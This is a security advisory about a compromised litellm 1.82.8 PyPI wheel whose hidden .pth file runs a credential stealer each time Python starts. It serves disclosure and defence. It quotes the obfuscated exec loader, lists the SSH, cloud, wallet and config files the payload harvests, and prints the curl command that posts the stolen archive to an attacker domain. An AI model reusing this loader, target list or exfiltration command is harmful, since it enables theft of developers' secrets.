The LiteLLM version 1.82.8 on PyPI has been compromised with a malicious .pth file that automatically executes a credential-stealing script, targeting SSH keys, cloud credentials, and environment variables.

Description

[Security]: CRITICAL: Malicious `litellm_init.pth`

in litellm 1.82.8 PyPI package — credential stealer

Summary

The litellm==1.82.8

wheel package on PyPI contains a malicious .pth

file (litellm_init.pth

, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm

required.

This is a supply chain compromise. The malicious file is listed in the package's own RECORD

litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628

Reproduction

pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
pth = [n for n in z.namelist() if n.endswith('.pth')]
print('PTH files:', pth)
for p in pth:
print(z.read(p)[:300])
"

You will see litellm_init.pth

containing:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])

Malicious Behavior (full analysis)

The payload is double base64-encoded. When decoded, it performs the following:

Stage 1: Information Collection

The script collects sensitive data from the host system:

System info:hostname

,whoami

,uname -a

,ip addr

,ip route

Environment variables:printenv

(captures all API keys, secrets, tokens)SSH keys:~/.ssh/id_rsa

,~/.ssh/id_ed25519

,~/.ssh/id_ecdsa

,~/.ssh/id_dsa

,~/.ssh/authorized_keys

,~/.ssh/known_hosts

,~/.ssh/config

Git credentials:~/.gitconfig

,~/.git-credentials

AWS credentials:~/.aws/credentials

,~/.aws/config

, IMDS token + security credentialsKubernetes secrets:~/.kube/config

,/etc/kubernetes/admin.conf

,/etc/kubernetes/kubelet.conf

,/etc/kubernetes/controller-manager.conf

,/etc/kubernetes/scheduler.conf

, service account tokensGCP credentials:~/.config/gcloud/application_default_credentials.json

Azure credentials:~/.azure/

Docker configs:~/.docker/config.json

,/kaniko/.docker/config.json

,/root/.docker/config.json

Package manager configs:~/.npmrc

,~/.vault-token

,~/.netrc

,~/.lftprc

,~/.msmtprc

,~/.my.cnf

,~/.pgpass

,~/.mongorc.js

Shell history:~/.bash_history

,~/.zsh_history

,~/.sh_history

,~/.mysql_history

,~/.psql_history

,~/.rediscli_history

Crypto wallets:~/.bitcoin/

,~/.litecoin/

,~/.dogecoin/

,~/.zcash/

,~/.dashcore/

,~/.ripple/

,~/.bitmonero/

,~/.ethereum/keystore/

,~/.cardano/

,~/.config/solana/

SSL/TLS private keys:/etc/ssl/private/

, Let's Encrypt.pem

and.key

filesCI/CD secrets:terraform.tfvars

,.gitlab-ci.yml

,.travis.yml

,Jenkinsfile

,.drone.yml

,Anchor.toml

,ansible.cfg

Database credentials: PostgreSQL, MySQL, Redis, LDAP config filesWebhook URLs: grep for Slack/Discord webhook URLs in env and config files

Stage 2: Encryption & Exfiltration

Collected data is written to a temporary file
A random 32-byte AES-256 session key is generated via openssl rand
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public keyviaopenssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:

curl -s -o /dev/null -X POST \
"https://models.litellm.cloud/" \
-H "Content-Type: application/octet-stream" \
-H "X-Filename: tpcp.tar.gz" \
--data-binary @tpcp.tar.gz

Key Technical Details

Trigger mechanism:.pth

files insite-packages/

are executed automatically by the Python interpreter on startup (see Python docs on .pth files). Noimport

statement is needed.Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.Exfiltration target:https://models.litellm.cloud/

— note the domainlitellm.cloud

(NOTlitellm.ai

, the official domain).RSA public key(first 64 chars):MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...

Impact

Anyone who installed litellm==1.82.8

via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.

This affects:

Local development machines
CI/CD pipelines
Docker containers
Production servers

Affected Version

Confirmed:litellm==1.82.8

(PyPI wheellitellm-1.82.8-py3-none-any.whl

)Other versions: Not yet checked — the attacker may have compromised multiple releases

Recommended Actions

PyPI: Yank/remove litellm 1.82.8 immediatelyUsers: Check forlitellm_init.pth

in yoursite-packages/

directoryUsers: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installedBerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise